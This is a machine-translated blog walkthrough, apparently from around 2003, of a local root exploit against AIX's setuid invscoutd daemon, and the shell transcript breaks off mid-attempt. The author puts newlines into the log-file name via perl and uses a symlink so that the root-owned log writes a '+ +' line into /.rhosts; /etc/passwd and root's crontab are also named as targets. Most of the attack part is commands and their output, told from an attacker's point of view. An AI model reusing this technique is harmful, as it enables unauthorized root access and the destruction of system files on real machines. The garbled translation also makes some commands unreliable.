Virus found? Catch insects in AIX -- invscoutd

Article Title: virus detection? Invscoutd. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
Platform information:
-Bash-2.05b $ oslevel
5.1.0.0
-Bash-2.05b $ oslevel-r
5100-01
　　
The invscoutd command should be checked in eight characters.
-Bash-2.05b $ ls-l/usr/sbin/invscoutd
-R-sr-xr-x 1 root system 217868 Aug 03 2001/usr/sbin/invscoutd
　　
Bash-2.05b $ man invscoutd
............
The invscoutd command implements a permanent Inventory Scout server daemon on
One machine in a user's local network. The usual client is a Java applet running
In the user's Web browser, which was downloaded from a central Inventory Scout
CGI application.
............
　　
Let's take a look at the appearance of this command:
Bash-2.05b $ invscoutd
Invscoutd: Missing log file name.
Inventory Scout Daemon 2.0.2. @ cat version @@@
USAGE: invscoutd [options] logfile <-- Description of the log file.
Logfile Append status and err msgs. '-'means write to stderr.
-O Overwrite preexisting log file instead of append. <-- Overwrite existing files
-PN Change port number to N from default 808. <-- the default listening port is port 808.
-BN Change read buffer size to N from default 1024.
-DN Change max logic db file size to N from default 50000.
-TN Change timeout period to N seconds from default 30 seconds.
-VN Change verbosity level to N from default 18, <-- supports interaction level. The higher the level, the more detailed the record information.
25 = max 20 = debug 18 = cballs 15 = banner 10 = errs 5 = fatal 0 = none.
　　
I vaguely remember that there were a lot of Unix vulnerabilities in the past that were related to incorrect processing of log file permissions. Let's take a look at this log file first.
　　
　　
Bash-2.05b $ ls-l/tmp/bb
Ls: 0653-341 The file/tmp/bb does not exist.
　　
-Bash-2.05b $ invscoutd/tmp/bb
Inventory Scout Version 1.3.0.0
Logic Database Version 1.3.0.0
Start invscoutd 2.0.2:
P = 808 u = 0 v = 18 t = 30 d = 50000 pid = 17028
Flog =/tmp/bb
Bash-2.05b $ ls-l/tmp/bb
-Rw-r -- 1 root staff 270 May 03/tmp/bb
　　
Wow ~~, The permission is correct !! The log file is root !!
　　
-Bash-2.05b $ id
Uid = 203 (cloud) gid = 1 (staff)
　　
That's right. It's a vulnerability. What can I do with it ??
Think ......
　　
At least destroy the important configuration files of the system. Haha ......
　　
Think about the important files that do not exist, such as the/. rhosts file (in fact, this file is used for the moment). We can use this vulnerability to create this file. If you run the umask 000 command before
The created file has the permission to modify it. ^_^
　　
In this way, we can rewrite the file content at will, such as adding a line in/. rhosts.
++
　　
Unfortunately, when using. rhosts, the r series services will check the file attributes:
If the file does not belong to the corresponding user, or the File Permission is granted to other users except the owner or users in the same group, the verification fails!
　　
It seems that it is not feasible to create a writable/. rhosts file to obtain the root permission ~~
　　
We overwrite important files such as/etc/passwd, and cannot change the file permissions ~~
　　
Let's go back and think about it again. Don't we just want to control the content of the written file? You cannot directly obtain the write permission for a file to write the content, which is indirectly controlled if the log file is written to the content /. does rhosts,/etc/passwd,/var/spool/cron/crontabs/root change itself to root?
　　
Let's take a look at what is written in the log file:
-Bash-2.05b $ cat/tmp/bb
2003/05/03 03:54:37 G16716: invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
2003/05/03 03:54:37 G16716: invscoutd_2.0.2 Logic Database Version 1.3.0.0
2003/05/03 03:54:37 P17028: invscoutd_2.0.2 Start invscoutd 2.0.2:
P = 808 u = 0 v = 18 t = 30 d = 50000 pid = 17028
Flog =/tmp/bb
　　
It seems that flog =/tmp/bb is related to the input.
　　
Try again to see if the problem can be reproduced.
　　
-Bash-2.05b $ invscoutd./aa
Inventory Scout Version 1.3.0.0
Logic Database Version 1.3.0.0
Exit code 2, pid 536968056.
　　
It seems that you have to kill the old process before trying again.
　　
-Bash-2.05b $ ps-ef | grep invs
Cloud 15526 1 0 04:36:25 pts/0 invscoutd./aa
Cloud 16068 16836 1 04:37:50 pts/0 grep invs
-Bash-2.05b $ kill-9 15526
　　
Check whether the log file has been recorded due to an error?
-Bash-2.05b $ ls-l./aa
Ls: 0653-341 The file./aa does not exist.
　　
No.
　　
　　
I will try again. I have to reproduce it once before I can rest assured.
-Bash-2.05b $ invscoutd./aa
Inventory Scout Version 1.3.0.0
Logic Database Version 1.3.0.0
Start invscoutd 2.0.2:
P = 808 u = 0 v = 18 t = 30 d = 50000 pid = 15526
Flog =./aa
　　
-Bash-2.05b $ ls-l./aa
Ls: 0653-341 The file./aa does not exist.
Why didn't I remember it? Do file names still have to start with a slash ?, No matter what it is, write it to/tmp and try again.
　　
I learned this time and killed the process first.
Bash-2.05b $ ps-ef | grep invsc
Cloud 14194 15338 3 03:55:29 pts/0 grep invsc
Cloud 17028 1 0 03:54:37 pts/0 invscoutd./aa
-Bash-2.05b $ kill-9 17028
　　
............
　　
After testing, we were able to reproduce and feel at ease ~~
　　
Think about it and rewrite it. rhosts, passwd, and crotable must be able to completely control the content of a row of written files when they break through the system permission to obtain the root privilege. What can be controlled in the log is: flog = input file name section, the line break in the file name can be used to control the content of a row, such as a file name like aaaa \ n's complete line \ naaaa.
　　
However, the command line cannot remember how to input \ n characters and use it as a parameter of the command line, the previous perl school came in handy ^ _ * using perl to execute a system command invscoutd "/tmp/bbbbb \ n ++ \ nddd ", check whether a single row of record content can be generated. ++
　　
-Bash-2.05b $ perl-e 'System invscoutd, "/tmp/bbbbb \ n ++ \ nddd ";'
Inventory Scout Version 1.3.0.0
Logic Database Version 1.3.0.0
Start invscoutd 2.0.2:
P = 808 u = 0 v = 18 t = 30 d = 50000 pid = 16282
Flog =/tmp/bbbbb
++
Ddd
-Bash-2.05b $ cat/tmp/bbbbb *
2003/05/03 03:59:09 G14204: invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
2003/05/03 03:59:09 G14204: invscoutd_2.0.2 Logic Database Version 1.3.0.0
03:59:09 G14204: invscoutd_2.0.2 Bind error, port 808: The socket name is already in use ..
03:59:09 G14204: invscoutd_2.0.2 Exit code 2, pid 536968072.
2003/05/03 03:59:27 G14934: invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
2003/05/03 03:59:27 G14934: invscoutd_2.0.2 Logic Database Version 1.3.0.0
2003/05/03 03:59:27 P16282: invscoutd_2.0.2 Start invscoutd 2.0.2:
P = 808 u = 0 v = 18 t = 30 d = 50000 pid = 16282
Flog =/tmp/bbbbb
++
Ddd
　　
Hey, you can say that !!
　　
-Bash-2.05b $ ls-l/tmp/bbbbb *
-Rw-r -- 1 root staff 602 May 03/tmp/bbbbb
++
Ddd
　　
Then how do we write "\ n ++ \ n" content to/. rhosts?
　　
　　
Think ......
　　
Think about it ......
　　
Oh, I thought of it. Have you thought of it?
　　
Let's give you another 5 minutes. Think about it ~~
　　
If you directly execute invscoutd/. rhosts
Certainly not. There will be no expectations in it.
++
Line.
　　
If we execute perl-e 'System invscoutd, "/tmp/bbbbb \ n ++ \ nddd ";'
Write to log file
++
Successful,
　　
But the written file is "/tmp/bbbbb \ n ++ \ nddd", and we want to write it to the/. rhosts file now ............
　　
To sum up, the core of the problem is to write the file name of A to file B. The Symbolic Link in Unix seems to be the bridge ~
　　
Let's create A symbolic connection between A and B!
Ln-s B
Then
Invscoutd
It should be.
　　
Start action:
　　
-Bash-2.05b $ ls-l/. rhosts
Ls: 0653-341 The file/. rhosts does not exist.
　　
Create A-> B symbolic link:
-Bash-2.05b $ perl-e 'symlink "/. rhosts", "/tmp/cc \ n ++ \ ndd ";'
Here B is "/. rhosts"
A is "/tmp/cc \ n ++ \ ndd"
　　
-Bash-2.05b $ ls-l/tmp/cc *
Lrwxrwxrwx 1 cloud staff 8 May 03 04: 02/tmp/cc
++
Dd->/. rhosts
　　
Come, execute
　　
-Bash-2.05b $ perl-e 'System invscoutd, "/tmp/cc \ n ++ \ ndd ";'
Inventory Scout Version 1.3.0.0
Logic Database Version 1.3.0.0
Exit code 2, pid 536968072.
-Bash-